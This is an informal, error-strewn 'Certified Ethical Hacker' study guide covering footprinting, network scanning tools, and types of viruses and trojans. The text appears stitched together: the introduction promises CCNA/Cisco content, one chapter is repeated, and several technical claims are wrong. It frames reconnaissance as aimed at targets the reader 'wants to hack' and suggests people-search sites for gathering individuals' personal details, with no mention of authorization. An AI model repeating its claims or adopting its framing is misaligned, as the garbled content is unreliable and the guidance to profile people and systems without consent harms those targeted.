CERTIFIED ETHICAL HACKER

Study Guide

copyright 2016 EAPL

Introduction
Welcome to the exciting world of Elysium certification program! You have picked up
this book because you want something better in career. Elysium assured to give better
technology update through this. And you have made a good decision to do career certification
in Elysium and we can help you get your best networking job, or more money and a
promotion if you are already in the field. Cisco certification can also improve your
understanding of the internetworking of more than just Cisco products: You will develop a
complete understanding of networking and how different network topologies work together
to form a network. This is beneficial to every networking job and is the reason Elysium
teaching is in such high demand, even at companies with few Cisco devices.

What Does this Book Cover?

This book covers everything you need to know in order to become CCNA certified.
However, taking the time to study and practice with routers or a router simulator is the
real key to success.
Most of the Hands-on Labs in the book assume that you have Cisco routers to play with.
If you don't you can practice with simulators and we will assist you in completing all of
the Hands-on Labs

copyright 2016 EAPL

INTRODUCTION TO ETHICAL HACKING

Module Objectives
1.
2.
3.
4.
5.

Overview of Current Security Trends

Understanding the Elements of Information Security
Understanding Information Security Threats and Attacks Vectors
Overview of Hacking Concepts, Types, and Phases
Understanding Ethical Hacking Concepts and Scope

Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors. It provides an insight into the different elements of information security.

Module Flow
1.
2.
3.
4.
5.
6.

Information Security Overview

Information Security Threats and Attack Vectors
Hacking Concepts, Types, and Phases
Ethical Hacking Concepts and Scope
Information Security Controls
Information Security Laws and Standards

Information Security refers to protecting or safeguarding information and information

systems that use, store, and transmit information for unauthorised access, disclosure,
alteration, and destruction.
Information is the critical asset that organizations need to secure. If sensitive information falls
into the wrong hands, then the respective organization may suffer huge financial loss, loss of
brand reputation, lose customers, etc. In an attempt to understand how secure such critical
information resources; let us start with an overview of information security.

Case Study: Google Play Hack

Problem: Turkish hacker Ibrahim Balic has brought down Google Plays entire system twice,
preventing developers from uploading new apps and updates to existing apps, and preventing
users from downloading content.
Cause:
Balic did not stop after that first attempt. He uploaded it again to confirm it was his work that
brought down the system. This resulted in a second DoS attack, once again causing the

copyright 2016 EAPL

database to crash. As a result, developers and users were unable to upload or download any
applications.

DIFFERENCE BETWEEN HACKER AND CRACKER

There are lots of articles on internet about the difference between Hackers and Crackers. For many
years, media has erroneously used the Hacker word with a Cracker. So the general public now
believes hacker is someone who breaks into computer systems, hacking passwords, websites and
misuses them. But this is absolutely untrue and it demoralizes some of our most talented hackers.
The greatness of misconception you can determine from the fact that worlds biggest authentic source
WIKIPEDIA has defined hackers in a incorrect way. Wikipedia has defined hackers in the following
way
Hacking is unauthorized use of computer and network resources. (The term Hacker
originally meant a very gifted programmer. In recent years though, with easier access to
multiple systems, it now has negative implications.)

There is a very thin line difference between the hacker and cracker. Like a coin has two faces
heads or tails, similar is true for computer experts. Some uses their techniques and expertize
to help the others and secure the systems or networks and some misuses them and use that for
their own selfish reasons.
There are several traditional ways that determines the difference between the hackers and
crackers. In this book we will provide you these ways in order of their acceptance in the
computer and IT market. First of all, let me provide you the basic definitions of both hackers
and crackers.

These definitions are as follows:

Hackers: A Hacker is a person who is extremely interested in exploring the things and
recondite workings of any computer system or networking system. Most often, hackers are
the expert programmers. These are also called Ethical Hackers or white hat hackers. And the
technique or hacking they perform is called ethical hacking.
Ethical Hacking Means you think like Hackers. i.e First you Hack the Systems and find out
the loop holes and then try to correct those Loop Holes, These types of hackers protect the
cyberworld from every possible threat and fixes the future coming security loop holes. These
peoples are also called as GURUs of Computer Security.

Crackers:

A Crackers or Black Hat hackers or cheaters or simply criminals, they are

called criminals because they are having the mind-set of causing harm to security and they

copyright 2016 EAPL

steals very useful data and use it in wrong ways. Phishers also come in this category who
steals account info and steal your credit card nos. and money over the Net.
Below is the Diagrams which shows the basic difference between cracker or black hat hackers
and Hackers or ethical hackers or white hat hackers.

We hope this will help you to clear most of your doubts about hackers and crackers. And the
most important thing, until and unless an ethical hacker thinks like a cracker you can never
become an expert ethical hacker because to get most out of any computer system you must
understand the mind-set of crackers that what they can do and up to what level they can
damage.
Now when you will identify the vulnerabilities and loopholes, If you fixes them so that in
future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or
White Hat hacker and if you utilize that loophole of misdeeds or for fun then its cracking or
Black hat hacking. And black hat hackers are intelligent peoples but criminals or simply
cyber cops call them evil genius.

BEST OPERATING SYSTEM FOR HACKERS

Most of users confused about which operating system is best for hackers and for doing
hacking activities like hacking wireless network passwords, network sniffers, reverse
engineering tools, application hacking tools and other encrypting and spoofing hacking tools.
Here we suggest operating system is Backtrack or kali Linux.
copyright 2016 EAPL

But you can also give a try to Matriux Operating System and knoppix, Matriux OS is just
awesome but its still under construction as designers are still working on it and patching it.
Now lets discuss more about functionality of Backtrack operating system.

Best Operating System: Backtrack Linux

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the
ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if youre making BackTrack your primary operating system, booting from a Live
DVD, or using your favorite thumb drive, BackTrack has been customized down to every
package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences from the most savvy security professionals to early
newcomers to the information security field. BackTrack promotes a quick and easy way to
find and update the largest database of security tool collection to-date.
Back Track is quite possibly the most comprehensive Linux distribution of security tools.
Both hackers and crackers can appreciate the features of this distribution. For black-hat
hackers, it provides an easy access to software that facilitates exploitations for secured
systems and other reverse engineering. For white-hatters, it is a penetration tester that finds
holes in a security scheme. See, everybody wins!
Major Features of BackTrack Linux
copyright 2016 EAPL

BackTrack features the latest in security penetration software. The current Linux
kernel is patched so that special driver installation is unnecessary for attacks. For
example, an Atheros-based wireless networking adapter will no enter monitor mode
or inject packets without the MadWiFi driver patch. With BackTrack, you dont need
to worry about that. Its just plug-and-play ready-to-go!
Whats great is that this Linux distribution comes Live-on-CD. So, no installation is
needed. However, what you experience BackTrack, you will realize that it is a must to
download this operating system and install it on your Laptop. At the very least,
download the VMWare Virtual Appliance for Backtrack. Make sure you also install
the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

Based on: Debian, Ubuntu

Origin: Switzerland

Architecture: i386

Desktop: Fluxbox, KDE

Category: Forensics, Rescue, Live Medium

Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:

Metasploit integration

RFMON Injection capable wireless drivers

Kismet

Nmap

Ettercap

Wireshark (formerly known as Ethereal)

BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as
browsers. BackTrack arranges tools into 11 categories:

Information Gathering

Network Mapping

Vulnerability Identification

Web Application Analysis

Radio Network Analysis (802.11, Bluetooth, Rfid)

Penetration (Exploit & Social Engineering Toolkit)

Privilege Escalation

Maintaining Access
copyright 2016 EAPL

Digital Forensics
Reverse Engineering
Voice Over IP

CHAPTER 1 FOOT PRINTING

Footprinting and How It can be HelpFul to Hack systems

copyright 2016 EAPL

What Is FOOTPRINTING?
Basically footprint is the blueprints of site/organisation/system that a hacker want to Hack i.e
basic internal structure.Footprinting is the blueprint of the security profile of an
organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Important Thing to be Noted : An attacker will spend 90% of the time in profiling an
organization and another 10% in launching the attack.
Footprinting results in a unique organization profile with respect to networks
(Internet/intranet/extranet /wireless) and systems involved.Dont It look amazing
The most interesting stage of a targeted attack is the reconnaissance, or footprint analysis.
Here you use the web, search engines, whois.com, to discover as much about the target as
possible. A whois.com can tell you email address formats for instance (first letter last name @
company.com).
A Google search could reveal submission to forums by security personnel that reveal brands
of firewall or antivirus in use at the target. Sometimes network diagrams are even found that
can guide an attack. The next stage, scanning, meant using special tools, ( I date myself by
mentioning Cybercop and Internet Security Scanner, these were the days before the open
source Nessus) to discover open ports, services, and machines on the target network. And
then, finally, you could start attacking various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now How It can Help You To GET

copyright 2016 EAPL

Info . I will Show It Through Snapshots

copyright 2016 EAPL

10

2. Now you can use this information to search more about Person using Simply google as
shown in next snapshot..
copyright 2016 EAPL

11

Now Its on you need How much info u want to explore about the person and website which u
want to hack

copyright 2016 EAPL

12

I think you all Will Like Thisss. WE will continue Our Discussion on FOOTPRINTING
tomorrow
also
As
It
is
the
Most
Important
Phase..
We will Explore More Information in the Next class. I will explain Few More interesting
facts and information exploring things so read on
UNEARTHING BASIC INFORMATION
First of all We will focus on Unearthing the Basic Information about the site i.e the IP and
server informations..
I will Show you with the help on snapshots :
First go to START > RUN >type cmd>then type tracert www.websitename.com
Here we will use two basic commands in command Prompt(cmd): tracert
www.webistetobeanlysed.com
and ping www.websitename.com
It will look something like this:

We
trace
routed
www.amulive.com
1.
Shows
Our
Gateway
of
connectivity.
2. Shows our Outgoing Footprint Ip(i.e the our IP that is being analyzed by website)
3. Shows Connectivity passes through which service Provider. I uses BSNL but its showing
airtel
because
I
prefer
DNS
of
Airtel
for
surfing
Quick).
Next steps showing the Ips of Webservers through which amulive is being maintained.
After This We will came to now the IP of the Website and Ip of itz web servers which are
being
used
further.
website Ip can be used to gather more information about the website..

copyright 2016 EAPL

13

How to Find The Personal Information About the Individual Over Net ??
Its one of the Most important task. Its also helpful in finding the fake profiles But
unfortuantely this is limited But we can use it to the Most There are two website which
will help us
1. http://people.yahoo.com ( best Site To trace People for their Personal Information and also
reverse Phone or mobile number Look up)

2. http://www.intellius.com ( But this site is limited to US only)

Sample Report from Intellius :

copyright 2016 EAPL

14

Satellite Picture of Joes House from Intellius:

Now Using these Sites you will be able to collect the personal information of the individuals
and also being able to identify the fake profiles..

TOOLS NEEDED FOR FOOTPRINTING :

You can avoid above hectic work by using this tool : SpiderFoot
Download link: http://www.binarypool.com/spiderfoot/
Information about SpiderFoot:

SpiderFoot is a free, open-source, domain footprinting tool. Given one or multiple domain
names (and when I say domains, Im referring to the DNS kind, not Windows domains), it
will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS
to build up information like:

Subdomains
Affiliates
Web server versions
Users (i.e. /~user)
Similar domains
copyright 2016 EAPL

15

Email addresses
Netblocks

ADDITIONAL FOOTPRINTING TOOLS :

Note all these tools are freewares .. U can easily google then and download these..

Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTrackerPro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-mail Spider

This is all about Footprinting . Now Use the Gathered information to make basic
Detailed Information about the Website/person

copyright 2016 EAPL

16

CHAPTER 2 SCANNING NETWORKS

Scanning and Attacking Open Ports
In Scanning Part We Will Cover the Following Topics in details :
~ Definition of scanning
~ Types and objectives of Scanning
~ Understanding Scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform Scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures

What Is Scanning ?? And Why We Focus On that ?

Scanning as from the name means that we will scan something to find some details etc etc
Scanning basically refers to the gathering of following four informations
We Scan systems for four basic purposes :-

copyright 2016 EAPL

17

To find specific IP address

Operating system
System Architecture
Services Running on system

The various types of scanning are as follows:

~Port Scanning
~Network Scanning
~Vulnerability Scanning
I want to Define These Terms here Only as they are of great use in further tutorial
PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system
or OS services. In Port scanning we scan for the open Ports which can be used to attack the
victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the
computers network services. Through this we will know that which port we will use to attack
the victim..
Network Scanning : Network scanning is basically a procedure of finding the active hosts on
the Network.
i.e We tries to find that system is standalone or multiuser
This is done either for the purpose of attacking them or for network security assessment i.e
how secured the network Is ??
Vulnerability Scanning : As from the name , In this type of scanning We scan the systems
for finding the vulnerability i.e the weakness in OS/database Once we find the
vulnerability or loop hole we can utilize it to Best..and attack the victim through that
OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.

We will prefer TOOLS for this because they will reduce our Hectic Work The first Tool
that we Use is the NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe

copyright 2016 EAPL

18

Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and
many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
SECOND TOOL IS NET TOOLS 5.0.70 :
Itz is a collection of various Networking Tools must for beginners
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html

~ Net Tools Suite Pack is a collection of scanning tools.

~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not Work but some are too good.

copyright 2016 EAPL

19

copyright 2016 EAPL

20

First of Which is OS Fingerprinting

What is OS Fingerprinting ??
OS fingerprinting is the method to determine the operating system that is running on the
target system.
The two different types of fingerprinting are:
Active stack fingerprinting
Passive fingerprinting
Active Stack FingerPrinting:
Based on the fact that OS vendors implement the TCP stack differently.Specially crafted
packets are sent to remote OSs and response is noted. The responses are then compared with
a database to determine the OS.
Passive FingerPrinting:
Passive banner grabbing refers to indirectly scanning a system to reveal its servers operating
system.
It is also based on the differential implantation of the stack and the various ways an OS
responds to it.
It uses sniffing techniques instead of the scanning techniques. It is less accurate than active
fingerprinting.
TOOL USED FOR OS FINGERPRINTING :p0f Os Fingerprinting Tool
DOWNLOAD:
http://lcamtuf.coredump.cx/p0f-win32.zip

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

machines that connect to your box (SYN mode),

machines you connect to (SYN+ACK mode),

machine you cannot connect to (RST+ mode),

machines whose communications you can observe.

P0f can also do many other tricks, and can detect or measure the following:

firewall presence, NAT use (useful for policy enforcement),

existence of a load balancer setup,
the distance to the remote system and its uptime,
other guys network hookup (DSL, OC3, avian carriers) and his ISP.

copyright 2016 EAPL

21

What is Vulnerability???
As I have Told in First class that Vulnerability is weakness in the network,system,database
etc We can call vulnerability as the Loophole i.e through which victim can be attacked.. We
first analyze the loophole and then try to use it to best to Hack the System of victim or
oraganisation or website
TOOL THAT WE USE FOR VULNERABILITY SCANNING ARE :
1. Nessus
2. Retina
NESSUS
The Nessus vulnerability scanner, is the world-leader in active scanners, featuring high
speed discovery, configuration auditing, asset profiling, sensitive data discovery and
vulnerability analysis of your security posture. Nessus scanners can be distributed throughout
an entire enterprise, inside DMZs, and across physically separate networks.

copyright 2016 EAPL

22

Features:
~ Plug-in-architecture
~ NASL (Nessus Attack Scripting Language)
~ Can test unlimited number of hosts simultaneously
~ Smart service recognition
~ Client-server architecture
~ Smart plug-ins
~ Up-to-date security vulnerability database

SAMPLE SNAPSHOT:

copyright 2016 EAPL

23

DOW
NLOAD NESSUS :
http://www.nessus.org/download/

RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform
vulnerability management, identifies known and zero day vulnerabilities plus provides
security risk assessment, enabling security best practices, policy enforcement, and regulatory
audits.
copyright 2016 EAPL

24

Features:
~ Retina network security scanner is a network vulnerability assessment scanner.
~ It can scan every machine on the target network, including a variety of operating system
platforms, networking devices, databases, and third party or custom applications.
~ It has the most comprehensive and up-to-date vulnerability database and scanning
technology.

SAMPLE SNAPSHOT:

copyright 2016 EAPL

25

DOWNLOAD RETINA:
http://www.eeye.com/html/products/retina/download/index.html

Now After Scanning the Systems for Vulnerabilites .. We will Now Going to attack the
Systems but before this we should know the Risk . This risk can be reduced to great extent by
using Proxies.. In Next Class We will Discuss what are Proxies and How they work and how
they are going to Help us and some undetectable and untraceable Proxy servers

SCANNING AND ATTACKING OPEN PORTS

In my Previous class I have explained about footprinting i.e getting the IP of the
Person/website/organisation whom you want to attack and extracting the personal
Information.. You all were thinking that what was the use of that .. In this class you will
came to know why we have undergo footprinting and analysis part
In Scanning Part We Will Cover the Following Topics in details :
~
~
~
~
~
~
~
~
~

Definition of scanning
Types and objectives of Scanning
Understanding Scanning methodology
Checking live systems and open ports
Understanding scanning techniques
Different tools present to perform Scanning
Understanding banner grabbing and OS fingerprinting
Drawing network diagrams of vulnerable hosts
Preparing proxies

copyright 2016 EAPL

26

~ Understanding anonymizers
~ Scanning countermeasures

What Is Scanning ?? And Why

We Focus On that ?
Scanning as from the name means that we will scan something to find some details etc
etc Scanning basically refers to the gathering of following four informations
We Scan systems for four basic purposes :-

To find specific IP address

Operating system

System Architecture

Services Running on system

The various types of scanning are as follows:

~Port Scanning
~Network Scanning
~Vulnerability Scanning

copyright 2016 EAPL

27

I want to Define These Terms here Only as they are of great use in further tutorial
PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for
system or OS services. In Port scanning we scan for the open Ports which can be used to
attack the victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the
computers network services. Through this we will know that which port we will use to
attack the victim..
Network Scanning : Network scanning is basically a procedure of finding the active
hosts on the Network.
i.e We tries to find that system is standalone or multiuser
This is done either for the purpose of attacking them or for network security assessment
i.e how secured the network Is ??
Vulnerability Scanning : As from the name , In this type of scanning We scan the
systems for finding the vulnerability i.e the weakness in OS/database Once we find the
vulnerability or loop hole we can utilize it to Best..and attack the victim through that

OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.

We will prefer TOOLS for this because they will reduce our Hectic Work The first Tool
that we Use is the

NMAP :

DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep,
and many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.

copyright 2016 EAPL

28

~ It can carry out all types of port scanning techniques.

SECOND TOOL IS NET TOOLS

5.0.70 :
Itz is a collection of various Networking Tools must for beginners
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html

~ Net Tools Suite Pack is a collection of scanning tools.

~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not Work but some are too good.

copyright 2016 EAPL

29

I thisnk thats Enough for Today .We will discuss more on scanning tomorrow Until You
try these tools..
If you have any problem in Using these tools then you can ask me ..I will help you use
these tools

copyright 2016 EAPL

30

INTRODUCTION TO TROJANS, VIRUSES AND BACKDOORS

Welcome Back Guys, After a heavy Busy Schedule I come with the Next Hacking Tutorial. I
think everybody who is using computer has faced the problem of viruses at least once in life.
In todays Class I will going to Introduce What are Trojans, Viruses, Backdoors, worms etc.
And How they work to infect the system. In later classes we will discuss more about them
Like How to Get rid of Viruses, Trojans etc. How to remove them and the Most Important
How to Use them for Hacking Victims systems etc.. So Guys Keep Reading..
Lets Start With Viruses What are These and How they Work..

VIRUSES:
Virus is a self-replicating program that produces its own code by attaching copies of itself
into other executable codes like executive files(.exe) ,Dynamic link Librarys(.dlls) etc..
Virus Generally operates in the background and offcourse without the Desire of the User as
Noone want that virus to harm their computer..ROFL :P
Some Well-known Characteristics of Viruses:
Resides in the memory and replicates itself while the program where it attached is
running
Does not reside in the memory after the execution of program
Can transform themselves by changing codes to appear different
copyright 2016 EAPL

31

Hides itself from detection by three ways:

1. Encrypts itself into cryptic symbols (encodes themselves with special Characters)
2. Alters the disk directory data to compensate the additional virus bytes(changes the the
location of the file by adding one additional bit to data location)
3. Uses stealth algorithms to redirect disk data
WORKING OF VIRUSES:
Generally most of the Viruses Works in two Phases:
1. Infection Phase
2. Attack Phase
From the name you can have the Idea what are these Phases .
1. Infection Phase:
Virus developers decide when to infect host systems programs
Some infect each time they are run and executed completely. Ex: Direct Viruses
Some virus codes infect only when users trigger them which include a day, time, or
a particular event
Ex: TSR viruses which get loaded into memory and infect at later stages
2. Attack Phase:
Some viruses have trigger events to activate and corrupt systems
Some viruses have bugs which replicate and perform activities like file deletion,
increasing session time
They corrupt the targets only after spreading completely as intended by their developers
It will be much more clear From the Snapshot that How the Virus Works:

copyright 2016 EAPL

32

Fig: Infection Phase that how file is attached to .exe files to infect Programs.

Fig: Attack Phase that how the Files are got Fragmented and system speed Slows Down

copyright 2016 EAPL

33

Why People Create Viruses??

I think Everybody thinking of that why people creates Viruses and which people Creates
them.. hahahaha Real Question that comes to my Mind when I was Newbie in this field..
Some of he Most Common Reasons are Discussed Below:

Research projects (People Doing Research Work Detect the Flaws in particular
system and creates Code for that)
Pranks(Just for fun like us people who just creates viruses for irritating frens)
Vandalism
To attack the products of specific companies (like Microsoft Products
Xp,Vista,Windows 7 etc.)
To distribute political messages
Financial gain(Stealing Money from accounts etc..)
Identity theft
Spyware (to Monitor the Working of Remote Computers)

SYMPTOMS OF VIRUS ATTACKS:

Hey guys below I have mentioned some symptoms that will indicate that your system is
infected from viruses..

If the system acts in an unprecedented manner, you can suspect a virus attack that
is Processes take more resources and are time consuming than previous i.e System hangs
frequently
Some More are mentioned Below:
If computer beeps with no display
If one out of two anti-virus programs report virus on the system
If the label of the hard drive change
Your computer freezes frequently or encounters errors
Your computer slows down when programs are started
You are unable to load the operating system
Files and folders are suddenly missing or their content changes
Your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes
Your friends mention that they have received messages from you but you never sent
such messages

copyright 2016 EAPL

34

DIFFERENCE BETWEEN WORMS AND VIRUSES

Most of us thinks that worms are viruses and their working is similar to viruses but this not
the real scenario. There is a Big difference between the general viruses and Worms.
A worm is a special type of virus that can replicate itself and use memory, but cannot
attach itself to other programs. A worm spreads through the infected network
automatically but a virus does not.
How To Detect Your System is Infected by Virus??
This is one of the major question to answer and the simplest answer to it is that there are
some General Indications that Indicates that System is infected or Not.
General Indications are stated Below:

Programs take longer to load than normal (because virus halts the normal working of
programs as it attaches itself to it, so the execution time increases) .
Computers hard drive constantly runs out of free space.
Files have strange names which are not recognizable.
Programs act erratically (Programs Gives errors on use)
Resources are used up easily (can be Easily viewed using task manager).

HOW THE VIRUS DOES INFECTS THE SYSTEM??

Viruses infect the system in the following ways:
1.
2.
3.
4.

Loads itself into memory and checks for executable on the disk.
Appends the malicious code to a legitimate program which is Important to the user.
Since the user is unaware of the replacement, he/she launches the infected program.
As a result of the infected program being executes, other programs get infected as
well.
5. The above cycle continues until the user realizes the anomaly within the system.

copyright 2016 EAPL

35

STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION

The life cycle indicated above is a general life cycle of the Virus from design Phase to
Elimination phase
VIRUS CLASSIFICATION TYPES OF VIRUSES
Viruses are classified on the basis of two basic Things:
1. What they Infect
2. How they infect
Examples:
System Sector or Boot Virus:
- Infects disk boot sectors and records.
File Virus:
-

Infects executable in OS file system.

Macro Virus:
- Infects documents, spreadsheets and databases such as word, excel and
access. Source Code

copyright 2016 EAPL

36

Virus:
-

Overwrites or appends host code by adding Trojan code in it.

Network Virus:
Spreads itself via email by using command and protocols of computer
network.

Different Types of Virus and Worms Explained

System Sector Viruses

System sectors are special areas on your disk containing programs that are executed when you boot
(start) your PC. System sectors (Master Boot Record and DOS Boot Record) are often targets
for viruses. These boot viruses use all of the common viral techniques to infect and
hide themselves. They rely on infected floppy disk left in the drive when the computer starts, they can
also be dropped by some file infectors or Trojans.

Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system.
A virus can hide itself by intercepting the anti-virus softwares request to read the file and passing the
request to the virus, instead of the OS. The virus can then return an uninfected version of the file to
the anti-virus software, so that it appears as if the file is clean.

Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk data content when booted with the infected
CD-ROM.
Example: Someone might give you a LINUX BOOTABLE CD-ROM.
When you boot the computer using the CD-ROM, all your data is gone. No Anti-virus can stop this
because AV software or the OS is not even loaded when you boot from a CD-ROM.

Self-Modification Virus
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them
for virus signatures.
A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses.
Self-modification viruses employ techniques that make detection by means of signatures difficult or
impossible. These viruses modify their code on each infection. (each infected file
contains a different variant of the virus)

Polymorphic Code Virus

copyright 2016 EAPL

37

A well-written polymorphic virus therefore has no parts that stay the same on each infection.To enable
polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or
mutation engine). Polymorphic code is a code that mutates while keeping the original algorithm intact.

Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables.
Metamorphic code is a code that can reprogram itself by translating its own code into a temporary
representation, and then back to normal code again.
For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it is part of the
metamorphic engine.

File Extension Virus

File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With
extensions turned off if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT.If
youve forgotten that extensions are actually turned off, you might think this is a text file and open
it. This is really an executable Visual Basic Script virus file and could do
serious damage .
Countermeasure is to turn off Hide file extensions in Windows.

copyright 2016 EAPL

38

How to stop virus or trojan attacks

If you want to know that your system is either infected by viruses and trojans then these
are certain techniques to know that:
1. Your Computer might be running slow usual than normal.
2. Some programs might open without your permission.
3. System start up takes too much time to start.
4. Various Error messages appear on Screen when you open something or without
opening also.
5. System registry has been disabled or folder options is missing.
6. The most important antivirus shows messages of detecting viruses time to time.
7. While scanning your system from any antivirus or anti spyware tool its showing
viruses and you noticed that viruses are not deleting.
and much more
Have you ever think about the reason why your system is got infected. What has
infected your system and if its done by any of your friend How he has done it. Surely No,
or in some cases you have tried to find the answer but you are not able to get proper
answer. But story is different here , I will tell all the ways How your system can be Get
infected and How you can protect it if its already infected How you can resolve the
problem. So here are few things How your System got Infected , some might be knowing
this but by some reason they have ignored them.

How a System is got Infected because to

Negligence?

1. Using Cracked Versions of software specially security ones like antivirus,

anti-spyware etc.
Why I have said this is the first and major cause of infection because of the following
simple reason that All hackers know that general internet user public always searches for
cracked versions of softwares and wishes to use them for free and Hacker take benefit
of them. You all now be thinking how it help hackers. We know that almost all antivirus
show each and every keygen as virus or some trojan depending upon its type. Now if we
all know that then how come hackers will forget this fact so what they do they attaches
trojans and viruses to these files and at the time When your antivirus shows it as virus

copyright 2016 EAPL

39

you ignores the alert and keep the keygen means trojan running.
NOTE: And Guys an important note for you all, If your antivirus doesnt show any keygen
or crack as a virus then dont ever think that its not a virus but its a most dangerous
thing. Why dangerous because now Hacker has used some more brain to fool you that is
he has made the virus undetectable simply edit the hex code of original virus. So what is
the moral of story Please dont use cracked versions.
Now you all be thinking that if we dont use the cracked versions then how we will able
to get full versions of the softwares. Dont worry when I am there no fear drink beer and
enjoy everything for free. Its solution will be in solutions step just read article.
2. Pen drive or USB drive :
The biggest cause of infection of your system is usb drives and external hard disks.
Now how a virus enters into your system using USB drives. You have connected your
USB drive to your friends computer and by chance (sorry its for sure i.e 100%) your
friends system is infected by virus or Trojans and its the property of Virus that it
replicates itself using memory. So when you connect your USB to your friends computer
your USB is now infected by virus and now when you connect this USB to your PC using
the property of your Windows that it searches the files in Newly connected device and
autorun the device and for doing this it loads the index of your USBs file system into
Memory and now if USB has virus its the property of virus its replicates itself using
system memory. Now if you are using good antivirus , your antivirus will pop warning
and alert messages and some times you ignores them means your system is also
infected. For USB drive virus solution keep reading article.
3. Downloading things from Unknown Sites:
Most of the users searches for thing over the internet and where ever they find their
desired result means file that they want they start downloading that from that site only.
Now how it affects your system suppose you want to download any wallpaper say Katrina
Kaif. Now hackers know the fact that Katrina has a huge fan following and user will
surely going to download it. Then what they do they simply bind their malicious codes
with some of files and when users download it his system is infected and he can never
imagine that the virus has come from wallpaper that he has downloaded from unknown
site. For its solution read on article.
4. The most important one Becoming a Hacker like Me (ROFL but its truth).
Why I have mentioned this you might be clear from the above discussion. Most of the
internet users always curious to know ways how can i hack my friends email account or
his system for these they download all type of shit from the internet and believe me
99.9% of this shit contains viruses and Trojans that sends your information to the
providers. Now I dont say that stop hacking but try to follow some basic steps to learn
hacking and first of all you must know how to protect yourself from such type of fake
softwares. For its solution read on article.

copyright 2016 EAPL

40

Now after discussing the things How you system is got infected by your simple
negligence. Its time You should Know How to fix them and protect your system from all
types of viruses and trojans.

HOW TO STOP VIRUS OR TROJANS ??

1. Using Good Antivirus:
There is a nice misconception between the internet users that full antivirus provides
better security. Ya its 100% truth but full antiviruses paid ones not the cracked ones.
There are several other solutions to them that you will get for absolutely Free and I
guarantee that it will protect your system 100% just doing some little configurations.
Best Free Antivirus : Avira Personal Antivirus i.e Antivir.
You can download avira for free from :
http://www.filehippo.com/download_antivir/
Now after downloading the antivirus what you have to do to make it as good as paid
antiviruses.
a. Install the antivirus and update it. Note updating antivirus regularly is compulsory.
Dont worry its not your work it will update itself automatically whenever update is
available.
b. After Installing at the right hand top corner you will see a CONFIGURATION button.
Just click on it now a new window will pop up.
c. Now There at left hand top you will see a click box in front of Expert is written . Click
on that now you will see several things in it. Now do the following setting one by one.
1. Click on Scanner click on all files and set the Scanner Priority to high and click on
apply.
2. Click on Guard and click on all files and click on Scan while reading and writing and
then click apply.
3. Click on General Now click on select all and click on apply. In general tab only go to
WMI section and click on advanced process protection and then click on apply.
4. After doing that restart your PC.
Now you have made your free antivirus an equivalent to the paid one..

Best Free Anti-Spyware: Spyware Terminator with crawler Web security toolbar.
Download It for free :

copyright 2016 EAPL

41

http://www.filehippo.com/download_spyware_terminator/
Install spyware terminator with web security tool bar . Now your following problems are
being solved:
1. No Trojan can attack you.
2. Protection from Malicious websites and much more..

2. Solution for Cracked version Softwares:

As I have mentioned earlier never download cracks and keygens directly to you system
but several other methods are there while you are searching for Crack or Keygen first try
to search for Serial Key if you found it then its awesome and if not what to do.
